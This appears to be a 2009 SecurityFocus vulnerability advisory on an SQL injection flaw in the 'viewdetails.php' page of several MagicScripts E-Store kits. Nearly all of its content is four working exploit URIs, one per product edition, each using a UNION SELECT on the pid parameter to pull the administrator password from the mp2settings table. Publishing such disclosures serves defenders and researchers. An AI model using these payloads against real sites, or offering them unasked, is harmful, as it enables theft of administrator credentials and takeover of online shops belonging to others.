Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

MagicScripts Multiple E-Store Scripts 'viewdetails.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

E-Store Kit-1:
http://www.example.com/viewdetails.php?pid=-1+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,AdminPassword,0,0+FROM+mp2settings--

E-Store Kit-2:
http://www.example.com/viewdetails.php?pid=-1+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,0,AdminPassword,0,0+FROM+mp2settings--

E-Store Kit-1 Pro PayPal Edition:
http://www.example.com/viewdetails.php?pid=-1+UNION+SELECT+0,0,AdminPassword,0,0,0,0,0,0,0,0+FROM+mp2settings--

E-Store Kit-2 PayPal Edition:
http://www.example.com/viewdetails.php?pid=-1+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,0,AdminPassword,0,0+FROM+mp2settings--







 

Privacy Statement
Copyright 2009, SecurityFocus